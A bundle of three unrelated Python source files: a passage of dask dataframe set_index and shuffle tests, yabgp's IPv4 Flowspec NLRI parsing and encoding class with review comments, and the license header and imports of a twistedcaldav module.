    assert ddf2.npartitions < 10
def make_part(n):
    """Build one synthetic partition with ``n`` random rows in columns x, y."""
    columns = {"x": np.random.random(n), "y": np.random.random(n)}
    return pd.DataFrame(columns)
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_reduces_partitions_large(shuffle):
    """npartitions='auto' with partition_size picks a sensible partition count."""
    nbytes = 1e6
    nparts = 50
    # Rows per partition so the total is roughly `nbytes`.
    n = int(nbytes / (nparts * 8))
    ddf = dd.DataFrame(
        {("x", i): (make_part, n) for i in range(nparts)},
        "x",
        make_part(1),
        [None] * (nparts + 1),
    )
    ddf2 = ddf.set_index(
        "x", shuffle=shuffle, npartitions="auto", partition_size=nbytes
    )
    assert 1 < ddf2.npartitions < 20
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_doesnt_increase_partitions(shuffle):
    """npartitions='auto' must never yield more partitions than the input had."""
    nparts = 2
    nbytes = 1e6
    n = int(nbytes / (nparts * 8))
    ddf = dd.DataFrame(
        {("x", i): (make_part, n) for i in range(nparts)},
        "x",
        make_part(1),
        [None] * (nparts + 1),
    )
    ddf2 = ddf.set_index(
        "x", shuffle=shuffle, npartitions="auto", partition_size=nbytes
    )
    assert ddf2.npartitions <= ddf.npartitions
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_detects_sorted_data(shuffle):
    """Already-sorted data should take a cheap path with a small graph."""
    df = pd.DataFrame({"x": range(100), "y": range(100)})
    ddf = dd.from_pandas(df, npartitions=10, name="x", sort=False)
    ddf2 = ddf.set_index("x", shuffle=shuffle)
    # A full shuffle would generate far more tasks than this bound.
    assert len(ddf2.dask) < ddf.npartitions * 4
def test_set_index_sorts():
    """Setting the index on unsorted timestamps yields a monotonic index."""
    # https://github.com/dask/dask/issues/2288
    vals = np.array(
        [
            1348550149000000000,
            1348550149000000000,
            1348558142000000000,
            1348558142000000000,
            1348585928000000000,
            1348585928000000000,
            1348600739000000000,
            1348601706000000000,
            1348600739000000000,
            1348601706000000000,
            1348614789000000000,
            1348614789000000000,
            1348621037000000000,
            1348621038000000000,
            1348621040000000000,
            1348621037000000000,
            1348621038000000000,
            1348621040000000000,
            1348637628000000000,
            1348638159000000000,
            1348638160000000000,
            1348638159000000000,
            1348638160000000000,
            1348637628000000000,
            1348646354000000000,
            1348646354000000000,
            1348659107000000000,
            1348657111000000000,
            1348659107000000000,
            1348657111000000000,
            1348672876000000000,
            1348672876000000000,
            1348682787000000000,
            1348681985000000000,
            1348682787000000000,
            1348681985000000000,
            1348728167000000000,
            1348728167000000000,
            1348730745000000000,
            1348730745000000000,
            1348750198000000000,
            1348750198000000000,
            1348750198000000000,
            1348753539000000000,
            1348753539000000000,
            1348753539000000000,
            1348754449000000000,
            1348754449000000000,
            1348761333000000000,
            1348761554000000000,
            1348761610000000000,
            1348761333000000000,
            1348761554000000000,
            1348761610000000000,
            1348782624000000000,
            1348782624000000000,
            1348782624000000000,
            1348782624000000000,
        ]
    )
    vals = pd.to_datetime(vals, unit="ns")
    # Split the values into three uneven chunks to form separate partitions.
    breaks = [10, 36, 58]
    dfs = []
    for i in range(len(breaks)):
        lo = sum(breaks[:i])
        hi = sum(breaks[i : i + 1])
        dfs.append(pd.DataFrame({"timestamp": vals[lo:hi]}, index=range(lo, hi)))
    ddf = dd.concat(dfs).clear_divisions()
    assert ddf.set_index("timestamp").index.compute().is_monotonic is True
def test_set_index():
    """Basic set_index on a column name, a Series, and a one-item list.

    NOTE(review): ``meta`` is a module-level fixture defined elsewhere in
    this file.
    """
    dsk = {
        ("x", 0): pd.DataFrame({"a": [1, 2, 3], "b": [4, 2, 6]}, index=[0, 1, 3]),
        ("x", 1): pd.DataFrame({"a": [4, 5, 6], "b": [3, 5, 8]}, index=[5, 6, 8]),
        ("x", 2): pd.DataFrame({"a": [7, 8, 9], "b": [9, 1, 8]}, index=[9, 9, 9]),
    }
    d = dd.DataFrame(dsk, "x", meta, [0, 4, 9, 9])
    full = d.compute()
    d2 = d.set_index("b", npartitions=3)
    assert d2.npartitions == 3
    assert d2.index.name == "b"
    assert_eq(d2, full.set_index("b"))
    # Index by a Series rather than a column name.
    d3 = d.set_index(d.b, npartitions=3)
    assert d3.npartitions == 3
    assert d3.index.name == "b"
    assert_eq(d3, full.set_index(full.b))
    d4 = d.set_index("b")
    assert d4.index.name == "b"
    assert_eq(d4, full.set_index("b"))
    # A single-element list is accepted like a plain column name.
    d5 = d.set_index(["b"])
    assert d5.index.name == "b"
    assert_eq(d5, full.set_index(["b"]))
def test_set_index_interpolate():
    """Requesting more partitions interpolates divisions between quantiles."""
    df = pd.DataFrame({"x": [4, 1, 1, 3, 3], "y": [1.0, 1, 1, 1, 2]})
    d = dd.from_pandas(df, 2)
    d1 = d.set_index("x", npartitions=3)
    assert d1.npartitions == 3
    assert set(d1.divisions) == set([1, 2, 3, 4])
    d2 = d.set_index("y", npartitions=3)
    # Interior divisions fall strictly between the min and max of y.
    assert d2.divisions[0] == 1.0
    assert 1.0 < d2.divisions[1] < d2.divisions[2] < 2.0
    assert d2.divisions[3] == 2.0
def test_set_index_interpolate_int():
    """Interpolated divisions for an integer column stay integers."""
    L = sorted(list(range(0, 200, 10)) * 2)
    df = pd.DataFrame({"x": 2 * L})
    d = dd.from_pandas(df, 2)
    d1 = d.set_index("x", npartitions=10)
    assert all(np.issubdtype(type(x), np.integer) for x in d1.divisions)
def test_set_index_timezone():
    """Divisions preserve datetime dtype, including timezone awareness."""
    s_naive = pd.Series(pd.date_range("20130101", periods=3))
    s_aware = pd.Series(pd.date_range("20130101", periods=3, tz="US/Eastern"))
    df = pd.DataFrame({"tz": s_aware, "notz": s_naive})
    d = dd.from_pandas(df, 2)
    d1 = d.set_index("notz", npartitions=2)
    s1 = pd.DatetimeIndex(s_naive.values, dtype=s_naive.dtype)
    assert d1.divisions[0] == s_naive[0] == s1[0]
    assert d1.divisions[-1] == s_naive[2] == s1[2]
    # We currently lose "freq". Converting data with pandas-defined dtypes
    # to numpy or pure Python can be lossy like this.
    d2 = d.set_index("tz", npartitions=2)
    s2 = pd.DatetimeIndex(s_aware, dtype=s_aware.dtype)
    assert d2.divisions[0] == s2[0]
    assert d2.divisions[-1] == s2[2]
    assert d2.divisions[0].tz == s2[0].tz
    assert d2.divisions[0].tz is not None
    # Comparing tz-aware divisions against a naive-dtype index must fail.
    s2badtype = pd.DatetimeIndex(s_aware.values, dtype=s_naive.dtype)
    with pytest.raises(TypeError):
        d2.divisions[0] == s2badtype[0]
@pytest.mark.parametrize("drop", [True, False])
def test_set_index_drop(drop):
    """The drop flag matches pandas for string and numeric column labels."""
    pdf = pd.DataFrame(
        {
            "A": list("ABAABBABAA"),
            "B": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
            "C": [1, 2, 3, 2, 1, 3, 2, 4, 2, 3],
        }
    )
    ddf = dd.from_pandas(pdf, 3)
    assert_eq(ddf.set_index("A", drop=drop), pdf.set_index("A", drop=drop))
    assert_eq(ddf.set_index("B", drop=drop), pdf.set_index("B", drop=drop))
    assert_eq(ddf.set_index("C", drop=drop), pdf.set_index("C", drop=drop))
    assert_eq(ddf.set_index(ddf.A, drop=drop), pdf.set_index(pdf.A, drop=drop))
    assert_eq(ddf.set_index(ddf.B, drop=drop), pdf.set_index(pdf.B, drop=drop))
    assert_eq(ddf.set_index(ddf.C, drop=drop), pdf.set_index(pdf.C, drop=drop))
    # numeric columns
    pdf = pd.DataFrame(
        {
            0: list("ABAABBABAA"),
            1: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
            2: [1, 2, 3, 2, 1, 3, 2, 4, 2, 3],
        }
    )
    ddf = dd.from_pandas(pdf, 3)
    assert_eq(ddf.set_index(0, drop=drop), pdf.set_index(0, drop=drop))
    assert_eq(ddf.set_index(2, drop=drop), pdf.set_index(2, drop=drop))
def test_set_index_raises_error_on_bad_input():
    """Multi-column (and nested-list) set_index is unsupported and must raise."""
    df = pd.DataFrame({"a": [1, 2, 3, 4, 5, 6, 7], "b": [7, 6, 5, 4, 3, 2, 1]})
    ddf = dd.from_pandas(df, 2)
    msg = r"Dask dataframe does not yet support multi-indexes"
    with pytest.raises(NotImplementedError) as err:
        ddf.set_index(["a", "b"])
    assert msg in str(err.value)
    with pytest.raises(NotImplementedError) as err:
        ddf.set_index([["a", "b"]])
    assert msg in str(err.value)
    # Even a nested single-column list is rejected.
    with pytest.raises(NotImplementedError) as err:
        ddf.set_index([["a"]])
    assert msg in str(err.value)
def test_set_index_sorted_true():
    """sorted=True reuses the existing graph and validates sortedness."""
    df = pd.DataFrame({"x": [1, 2, 3, 4], "y": [10, 20, 20, 40], "z": [4, 3, 2, 1]})
    a = dd.from_pandas(df, 2, sort=False)
    assert not a.known_divisions
    b = a.set_index("x", sorted=True)
    assert b.known_divisions
    # No shuffle: the original graph must be embedded in the result's graph.
    assert set(a.dask).issubset(set(b.dask))
    for drop in [True, False]:
        assert_eq(a.set_index("x", drop=drop), df.set_index("x", drop=drop))
        assert_eq(
            a.set_index(a.x, sorted=True, drop=drop), df.set_index(df.x, drop=drop)
        )
        assert_eq(
            a.set_index(a.x + 1, sorted=True, drop=drop),
            df.set_index(df.x + 1, drop=drop),
        )
    # z is descending, so claiming sorted=True must raise.
    with pytest.raises(ValueError):
        a.set_index(a.z, sorted=True)
def test_set_index_sorted_single_partition():
    """sorted=True on a single-partition frame matches pandas set_index."""
    pdf = pd.DataFrame({"x": [1, 2, 3, 4], "y": [1, 0, 1, 0]})
    single_part = dd.from_pandas(pdf, npartitions=1)
    assert_eq(single_part.set_index("x", sorted=True), pdf.set_index("x"))
def test_set_index_sorted_min_max_same():
    """Partitions whose min == max still yield valid (repeated) divisions."""
    a = pd.DataFrame({"x": [1, 2, 3], "y": [0, 0, 0]})
    b = pd.DataFrame({"x": [1, 2, 3], "y": [1, 1, 1]})
    aa = delayed(a)
    bb = delayed(b)
    df = dd.from_delayed([aa, bb], meta=a)
    assert not df.known_divisions
    df2 = df.set_index("y", sorted=True)
    # Second partition is constant 1, so the last two divisions coincide.
    assert df2.divisions == (0, 1, 1)
def test_set_index_empty_partition():
    """set_index works when some partitions are empty, for several dtypes."""
    test_vals = [1, 2, 3]
    converters = [int, float, str, lambda x: pd.to_datetime(x, unit="ns")]
    for conv in converters:
        df = pd.DataFrame(
            [{"x": conv(i), "y": i} for i in test_vals], columns=["x", "y"]
        )
        # Second concatenated frame is empty (filter can never match).
        ddf = dd.concat(
            [
                dd.from_pandas(df, npartitions=1),
                dd.from_pandas(df[df.y > df.y.max()], npartitions=1),
            ]
        )
        assert any(ddf.get_partition(p).compute().empty for p in range(ddf.npartitions))
        # NOTE(review): the outer `assert` appears redundant — assert_eq is
        # used bare elsewhere in this file.
        assert assert_eq(ddf.set_index("x"), df.set_index("x"))
def test_set_index_on_empty():
    """set_index on a fully-empty frame collapses to a single empty partition."""
    test_vals = [1, 2, 3, 4]
    converters = [int, float, str, lambda x: pd.to_datetime(x, unit="ns")]
    for converter in converters:
        df = pd.DataFrame([{"x": converter(x), "y": x} for x in test_vals])
        ddf = dd.from_pandas(df, npartitions=4)
        assert ddf.npartitions > 1
        # Filter matches no rows, leaving an empty frame before set_index.
        ddf = ddf[ddf.y > df.y.max()].set_index("x")
        expected_df = df[df.y > df.y.max()].set_index("x")
        assert assert_eq(ddf, expected_df)
        assert ddf.npartitions == 1
def test_set_index_categorical():
    """Ordered-categorical index: divisions sort by the categorical order."""
    # https://github.com/dask/dask/issues/5671
    order = list(reversed(string.ascii_letters))
    values = list(string.ascii_letters)
    random.shuffle(values)
    dtype = pd.api.types.CategoricalDtype(order, ordered=True)
    df = pd.DataFrame({"A": pd.Categorical(values, dtype=dtype), "B": 1})
    result = dd.from_pandas(df, npartitions=2).set_index("A")
    assert len(result) == len(df)
    # sorted with the metric defined by the Categorical
    divisions = pd.Categorical(result.divisions, dtype=dtype)
    assert_categorical_equal(divisions, divisions.sort_values())
def test_compute_divisions():
    """compute_and_set_divisions fills in divisions without altering the data."""
    from dask.dataframe.shuffle import compute_and_set_divisions
    df = pd.DataFrame(
        {"x": [1, 2, 3, 4], "y": [10, 20, 20, 40], "z": [4, 3, 2, 1]},
        index=[1, 3, 10, 20],
    )
    a = dd.from_pandas(df, 2, sort=False)
    assert not a.known_divisions
    # Operates on a copy so the original frame keeps unknown divisions.
    b = compute_and_set_divisions(copy(a))
    assert_eq(a, b, check_divisions=False)
    assert b.known_divisions
def test_empty_partitions():
    """Repartitioning after set_index tolerates partitions left empty."""
    # See https://github.com/dask/dask/issues/2408
    df = pd.DataFrame({"a": list(range(10))})
    df["b"] = df["a"] % 3
    df["c"] = df["b"].astype(str)
    ddf = dd.from_pandas(df, npartitions=3)
    ddf = ddf.set_index("b")
    ddf = ddf.repartition(npartitions=3)
    # Must not fail even if this partition ended up empty.
    ddf.get_partition(0).compute()
    assert_eq(ddf, df.set_index("b"))
    # Re-index again on a string column.
    ddf = ddf.set_index("c")
    assert_eq(ddf, df.set_index("b").set_index("c"))
def test_remove_nans():
    """remove_nans fills NaN divisions from neighbors, for several dtypes.

    Each test case is (input divisions with None gaps, expected filled
    divisions); each converter pairs a dtype cast with its NaN sentinel.
    """
    tests = [
        ((1, 1, 2), (1, 1, 2)),
        ((None, 1, 2), (1, 1, 2)),
        ((1, None, 2), (1, 2, 2)),
        ((1, 2, None), (1, 2, 2)),
        ((1, 2, None, None), (1, 2, 2, 2)),
        ((None, None, 1, 2), (1, 1, 1, 2)),
        ((1, None, None, 2), (1, 2, 2, 2)),
        ((None, 1, None, 2, None, 3, None), (1, 1, 2, 2, 3, 3, 3)),
    ]
    converters = [
        (int, np.nan),
        (float, np.nan),
        (str, np.nan),
        (lambda x: pd.to_datetime(x, unit="ns"), np.datetime64("NaT")),
    ]
    for conv, none_val in converters:
        for inputs, expected in tests:
            params = [none_val if x is None else conv(x) for x in inputs]
            expected = [conv(x) for x in expected]
            assert remove_nans(params) == expected
@pytest.mark.slow
def test_gh_2730():
    """Regression for dask#2730: merge with very unequal partition counts."""
    large = pd.DataFrame({"KEY": np.arange(0, 50000)})
    small = pd.DataFrame({"KEY": np.arange(25, 500)})
    dd_left = dd.from_pandas(small, npartitions=3)
    dd_right = dd.from_pandas(large, npartitions=257)
    with dask.config.set(shuffle="tasks", scheduler="sync"):
        dd_merged = dd_left.merge(dd_right, how="inner", on="KEY")
        result = dd_merged.compute()
    expected = large.merge(small, how="inner", on="KEY")
    # Compare ignoring row order.
    tm.assert_frame_equal(result.sort_values("KEY").reset_index(drop=True), expected)
@pytest.mark.parametrize("npartitions", [None, "auto"])
def test_set_index_does_not_repeat_work_due_to_optimizations(npartitions):
    """Each input partition must be materialized exactly once by set_index."""
    # Atomic counter
    count = itertools.count()
    def increment():
        next(count)
    def make_part(dummy, n):
        # NOTE(review): this local make_part (two-arg) shadows the
        # module-level one-arg make_part defined earlier in the file.
        return pd.DataFrame({"x": np.random.random(n), "y": np.random.random(n)})
    nbytes = 1e6
    nparts = 50
    n = int(nbytes / (nparts * 8))
    # Every partition build bumps the counter via its ("inc", i) dependency.
    dsk = {("inc", i): (increment,) for i in range(nparts)}
    dsk.update({("x", i): (make_part, ("inc", i), n) for i in range(nparts)})
    ddf = dd.DataFrame(dsk, "x", make_part(None, 1), [None] * (nparts + 1))
    ddf.set_index("x", npartitions=npartitions)
    ntimes = next(count)
    assert ntimes == nparts
def test_set_index_errors_with_inplace_kwarg():
    """inplace=True is unsupported by dask and must raise NotImplementedError."""
    pdf = pd.DataFrame({"a": [9, 8, 7], "b": [6, 5, 4], "c": [3, 2, 1]})
    frame = dd.from_pandas(pdf, npartitions=1)
    # The ordinary out-of-place call succeeds.
    frame.set_index("a")
    with pytest.raises(NotImplementedError):
        frame.set_index("a", inplace=True)
def test_set_index_timestamp():
    """tz-aware timestamp divisions round-trip by instant and timezone."""
    df = pd.DataFrame({"A": pd.date_range("2000", periods=12, tz="US/Central"), "B": 1})
    ddf = dd.from_pandas(df, 2)
    divisions = (
        pd.Timestamp("2000-01-01 00:00:00-0600", tz="US/Central", freq="D"),
        pd.Timestamp("2000-01-12 00:00:00-0600", tz="US/Central", freq="D"),
    )
    # Note: `freq` is lost during round trip
    df2 = df.set_index("A")
    ddf_new_div = ddf.set_index("A", divisions=divisions)
    # Compare by raw value and tz rather than full equality (freq differs).
    for (ts1, ts2) in zip(divisions, ddf_new_div.divisions):
        assert ts1.value == ts2.value
        assert ts1.tz == ts2.tz
    assert_eq(df2, ddf_new_div)
    assert_eq(df2, ddf.set_index("A"))
@pytest.mark.parametrize("compression", [None, "ZLib"])
def test_disk_shuffle_with_compression_option(compression):
    """Disk shuffle should work both with compression enabled and disabled."""
    shuffle_config = {"dataframe.shuffle-compression": compression}
    with dask.config.set(shuffle_config):
        test_shuffle("disk")
@pytest.mark.parametrize("compression", ["UNKOWN_COMPRESSION_ALGO"])
def test_disk_shuffle_with_unknown_compression(compression):
    """An unrecognized compression name must raise a descriptive ImportError."""
    # test if dask raises an error in case of fault config string
    with dask.config.set({"dataframe.shuffle-compression": compression}):
        with pytest.raises(
            ImportError,
            match=(
                "Not able to import and load {0} as compression algorithm."
                "Please check if the library is installed and supported by Partd.".format(
                    compression
                )
            ),
        ):
            test_shuffle("disk")
def test_disk_shuffle_check_actual_compression():
    """Compression must actually shrink the partd bytes written to disk."""
    # test if the compression switch is really respected by testing the size of the actual partd-data on disk
    def generate_raw_partd_file(compression):
        # generate and write a dummy dataframe to disk and return the raw data bytes
        df1 = pd.DataFrame({"a": list(range(10000))})
        df1["b"] = (df1["a"] * 123).astype(str)
        with dask.config.set({"dataframe.shuffle-compression": compression}):
            p1 = maybe_buffered_partd(buffer=False, tempdir=None)()
            p1.append({"x": df1})
            # get underlying filename from partd - depending on nested structure of partd object
            filename = (
                p1.partd.partd.filename("x") if compression else p1.partd.filename("x")
            )
            return open(filename, "rb").read()
    # get compressed and uncompressed raw data
    uncompressed_data = generate_raw_partd_file(compression=None)
    compressed_data = generate_raw_partd_file(compression="BZ2")
    assert len(uncompressed_data) > len(compressed_data)
@pytest.mark.parametrize("ignore_index", [None, True, False])
@pytest.mark.parametrize(
    "on", ["id", "name", ["id", "name"], pd.Series(["id", "name"])]
)
@pytest.mark.parametrize("max_branch", [None, 4])
def test_dataframe_shuffle_on_tasks_api(on, ignore_index, max_branch):
    """shuffle(on=...) gives the same result for column names or a frame."""
    # Make sure DataFrame.shuffle API returns the same result
    # whether the ``on`` argument is a list of column names,
    # or a separate DataFrame with equivalent values...
    df_in = dask.datasets.timeseries(
        "2000",
        "2001",
        types={"value": float, "name": str, "id": int},
        freq="2H",
        partition_freq="1M",
        seed=1,
    )
    if isinstance(on, str):
        ext_on = df_in[[on]].copy()
    else:
        ext_on = df_in[on].copy()
    df_out_1 = df_in.shuffle(
        on, shuffle="tasks", ignore_index=ignore_index, max_branch=max_branch
    )
    df_out_2 = df_in.shuffle(ext_on, shuffle="tasks", ignore_index=ignore_index)
    assert_eq(df_out_1, df_out_2)
def test_set_index_overlap():
    """Repartitioning on existing divisions round-trips with duplicate keys."""
    pdf = pd.DataFrame({"key": [1, 2, 3, 4, 4, 5, 6, 7], "value": list("abcd" * 2)})
    indexed = dd.from_pandas(pdf, npartitions=2).set_index("key", sorted=True)
    roundtripped = indexed.repartition(divisions=indexed.divisions)
    assert_eq(indexed, roundtripped)
|
|
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""IPv4 Flowspec NLRI
"""
from __future__ import division
from builtins import range
import binascii
import math
import struct
import netaddr
from yabgp.common import constants as bgp_cons
from yabgp.message.attribute.nlri import NLRI
class IPv4FlowSpec(NLRI):
    """Parse and construct IPv4 Flowspec NLRI (filter components + operators)."""
    @classmethod
    def parse(cls, value):
        """
        Parse an IPv4 flowspec NLRI value into ``{component-type: value}``.

        :param value: raw NLRI component bytes (the leading NLRI length
            octet(s) are assumed to have been stripped by the caller)
        :return: dict mapping flowspec component type constant to either a
            prefix string or an operator-expression string
        """
        # +------------------------------+
        # | length (0xnn or 0xfn nn)     |
        # +------------------------------+
        # | NLRI value  (variable)       |
        # +------------------------------+
        nlri_dict = {}
        while value:
            offset = 0
            # First octet of each component is its type.
            flowspec_type = ord(value[0:1])
            offset += 1
            # decode all kinds of flow spec
            if flowspec_type in [bgp_cons.BGPNLRI_FSPEC_DST_PFIX, bgp_cons.BGPNLRI_FSPEC_SRC_PFIX]:
                # Prefix-valued components: <len, prefix bytes>.
                prefix, offset_tmp = cls.parse_prefix(value[offset:])
                offset += offset_tmp
                nlri_dict[flowspec_type] = prefix
                value = value[offset:]
            elif flowspec_type in [bgp_cons.BGPNLRI_FSPEC_IP_PROTO, bgp_cons.BGPNLRI_FSPEC_DST_PORT,
                                   bgp_cons.BGPNLRI_FSPEC_SRC_PORT, bgp_cons.BGPNLRI_FSPEC_ICMP_TP,
                                   bgp_cons.BGPNLRI_FSPEC_ICMP_CD, bgp_cons.BGPNLRI_FSPEC_DSCP,
                                   bgp_cons.BGPNLRI_FSPEC_PCK_LEN]:
                # Operator-valued components. Note: `offset` is overwritten
                # here; parse_operators compensates by returning its consumed
                # byte count + 1 (the type octet already read above).
                operator_list, offset = cls.parse_operators(value[offset:])
                nlri_dict[flowspec_type] = cls.operator_dict_to_str(operator_list)
                value = value[offset:]
            else:
                # Unknown component types fall back to the same generic
                # operator decoding.
                operator_list, offset = cls.parse_operators(value[offset:])
                nlri_dict[flowspec_type] = cls.operator_dict_to_str(operator_list)
                value = value[offset:]
        return nlri_dict
    @classmethod
    def construct(cls, value):
        """Concatenate the encodings of a list of NLRI dicts into bytes."""
        nlri_hex = b''
        for nlri in value:
            nlri_hex += cls.construct_nlri(nlri)
        return nlri_hex
    @classmethod
    def construct_nlri(cls, data):
        """ Construct NLRI """
        # there may have many filters in each nlri
        data = dict([(int(l), r) for (l, r) in data.items()])
        nlri_tmp = b''
        # Prefix components first, then operator components, in fixed order.
        for type_tmp in [bgp_cons.BGPNLRI_FSPEC_DST_PFIX, bgp_cons.BGPNLRI_FSPEC_SRC_PFIX]:
            if data.get(type_tmp):
                nlri_tmp += struct.pack('!B', type_tmp) + cls.construct_prefix(data[type_tmp])
        for type_tmp in [bgp_cons.BGPNLRI_FSPEC_IP_PROTO, bgp_cons.BGPNLRI_FSPEC_PORT,
                         bgp_cons.BGPNLRI_FSPEC_DST_PORT, bgp_cons.BGPNLRI_FSPEC_SRC_PORT,
                         bgp_cons.BGPNLRI_FSPEC_ICMP_TP, bgp_cons.BGPNLRI_FSPEC_ICMP_CD,
                         bgp_cons.BGPNLRI_FSPEC_PCK_LEN, bgp_cons.BGPNLRI_FSPEC_DSCP]:
            if not data.get(type_tmp):
                continue
            # translate from expression to binary
            nlri_tmp += struct.pack('!B', type_tmp) + cls.construct_operators(data[type_tmp])
        # One-octet length below 240, two-octet length otherwise.
        # NOTE(review): RFC 5575 requires the extended two-octet length to
        # carry 0xf in the top nibble; plain '!H' does not set it — confirm.
        if len(nlri_tmp) >= 240:
            return struct.pack('!H', len(nlri_tmp)) + nlri_tmp
        elif nlri_tmp:
            return struct.pack('!B', len(nlri_tmp)) + nlri_tmp
    @staticmethod
    def parse_prefix(data):
        """
        Prefixes are encoded as in BGP UPDATE messages, a length in bits is followed by
        enough octets to contain the prefix information.
        Encoding: <prefix-length (1 octet), prefix>

        :return: tuple of (``"a.b.c.d/len"`` string, number of bytes consumed)
        """
        prefix_len = ord(data[0:1])
        octet_len = int(math.ceil(prefix_len / 8))
        tmp = data[1:octet_len + 1]
        # Python 3 bytes iterate as ints; Python 2 str needs ord().
        if isinstance(tmp[0], int):
            prefix_data = [i for i in tmp]
        else:
            prefix_data = [ord(i) for i in tmp]
        # Pad with '0' entries so short prefixes still format as 4 octets.
        prefix_data = prefix_data + list(str(0)) * 4
        prefix = "%s.%s.%s.%s" % (tuple(prefix_data[0:4])) + '/' + str(prefix_len)
        return prefix, octet_len + 1
    @classmethod
    def construct_prefix(cls, prefix):
        """
        construct a prefix string from '1.1.1.0/24' to '\x18\x01\x01\x01'
        """
        ip, masklen = prefix.split('/')
        ip_hex = netaddr.IPAddress(ip).packed
        masklen = int(masklen)
        # Only emit as many address octets as the mask length requires.
        if 16 < masklen <= 24:
            ip_hex = ip_hex[0:3]
        elif 8 < masklen <= 16:
            ip_hex = ip_hex[0:2]
        elif 0 < masklen <= 8:
            ip_hex = ip_hex[0:1]
        elif masklen == 0:
            ip_hex = ''
        return struct.pack('!B', masklen) + ip_hex
    @classmethod
    def parse_operators(cls, data):
        """Decode a run of {operator-flag, value} pairs until EOL is set.

        :return: (list of [flag-dict, int value] pairs, bytes consumed + 1).
            The extra +1 accounts for the component-type octet the caller
            already consumed but whose offset it discards (see ``parse``).
        """
        offset = 0
        parse_operator_list = []
        while data:
            operator = cls.parse_operator_flag(ord(data[0:1]))
            # print(operator)
            offset += 1
            # Value is a big-endian integer of LEN bytes.
            operator_value = int(binascii.b2a_hex(data[1:1 + operator['LEN']]), 16)
            offset += operator['LEN']
            parse_operator_list.append([operator, operator_value])
            # the end of the list
            data = data[1 + operator['LEN']:]
            if operator['EOL']:
                break
        return parse_operator_list, offset + 1
    @staticmethod
    def parse_operator_flag(data):
        """
        The operator byte is encoded as:
        0   1   2   3   4  5   6   7
        +---+---+---+---+---+---+---+---+
        |EOL|AND| LEN |RES|LT |GT |EQ |
        +---+---+---+---+---+---+---+---+
        """
        bit_list = []
        for i in range(8):
            bit_list.append((data >> i) & 1)
        bit_list.reverse()
        result = {
            'EOL': bit_list[0],
            'AND': bit_list[1],
            # Two-bit length field: value byte count is 1 << len (1/2/4/8).
            'LEN': 1 << (bit_list[2] * 2 + bit_list[3]),
            'LT': bit_list[5],
            'GT': bit_list[6],
            'EQ': bit_list[7]
        }
        return result
    @staticmethod
    def construct_operator_flag(data):
        """construct operator flag from dict to binary
        """
        opt_dict = {
            'EOL': 0x80,
            'AND': 0x40,
            # NOTE(review): parse_operator_flag decodes len bits 0b11 as 8
            # bytes, but this table maps 6 -> 0x30 — one of the two looks
            # inconsistent (RFC 5575 uses 8); confirm.
            'LEN': {
                1: 0x00,
                2: 0x10,
                4: 0x20,
                6: 0x30
            },
            'RES': 0x00,
            'LT': 0x04,
            'GT': 0x02,
            'EQ': 0x01
        }
        b_data = 0x00
        for opt in opt_dict:
            if opt in data and opt != 'LEN':
                if data[opt] == 1:
                    b_data += opt_dict[opt]
            elif opt == 'LEN' and data[opt]:
                b_data += opt_dict['LEN'][data['LEN']]
        return b_data
    @staticmethod
    def operator_dict_to_str(data):
        """
        from
        [
            [
                {'AND': 0, 'GT': 0, 'LEN': 1, 'EOL': 0, 'LT': 0, 'EQ': 1},
                254
            ],
            [
                {'AND': 0, 'GT': 1, 'LEN': 1, 'EOL': 0, 'LT': 0, 'EQ': 1},
                254
            ],
            [
                {'AND': 1, 'GT': 0, 'LEN': 2, 'EOL': 1, 'LT': 1, 'EQ': 1},
                300
            ]
        ]
        to
        =254|>=254&<=300
        :param data: dict
        :return: string format
        """
        return_str = ''
        for item in data:
            operator_dict, value = item
            # AND joins with '&'; otherwise separate terms with '|'.
            if operator_dict['AND']:
                return_str += '&'
            else:
                if return_str != '':
                    return_str += '|'
            if operator_dict['GT']:
                return_str += '>'
            if operator_dict['LT']:
                return_str += '<'
            if operator_dict['EQ']:
                return_str += '='
            return_str += str(value)
        return return_str
    @classmethod
    def construct_operators(cls, data):
        """
        from "=254|>=254&<=300" to binary data
        :param data:
        :return:
        """
        data_bin = b''
        data_list = data.split('|')
        eol = 0
        for i, data in enumerate(data_list):
            # Last term in the expression carries the EOL flag.
            if i == len(data_list) - 1:
                eol = 1
            if '&' not in data:
                flag_dict = {'EOL': eol}
                # Strip the comparison prefix and record the matching flags.
                if data[0] == '=':
                    off_set = 1
                    flag_dict['EQ'] = 1
                elif '>=' in data:
                    off_set = 2
                    flag_dict['EQ'] = 1
                    flag_dict['GT'] = 1
                elif '<=' in data:
                    off_set = 2
                    flag_dict['EQ'] = 1
                    flag_dict['LT'] = 1
                elif '>' in data:
                    off_set = 1
                    flag_dict['GT'] = 1
                elif '<' in data:
                    off_set = 1
                    flag_dict['LT'] = 1
                hex_str = hex(int(data[off_set:]))[2:]
                if len(hex_str) % 2 == 1:
                    hex_str = '0' + hex_str
                value_hex = bytearray.fromhex(hex_str)
                # NOTE(review): LEN here is the raw byte count; values needing
                # 3 or 5+ bytes have no entry in construct_operator_flag's LEN
                # table and would raise KeyError — confirm intended input range.
                flag_dict['LEN'] = len(value_hex)
                opt_flag_bin = cls.construct_operator_flag(flag_dict)
                data_bin += struct.pack('!B', opt_flag_bin)
                data_bin += value_hex
        return data_bin
|
|
##
# Copyright (c) 2005-2015 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from txweb2.http_headers import Headers
from twistedcaldav.config import ConfigDict
from twistedcaldav.stdconfig import _updateClientFixes
from twistedcaldav.util import bestAcceptType, userAgentProductTokens, matchClientFixes
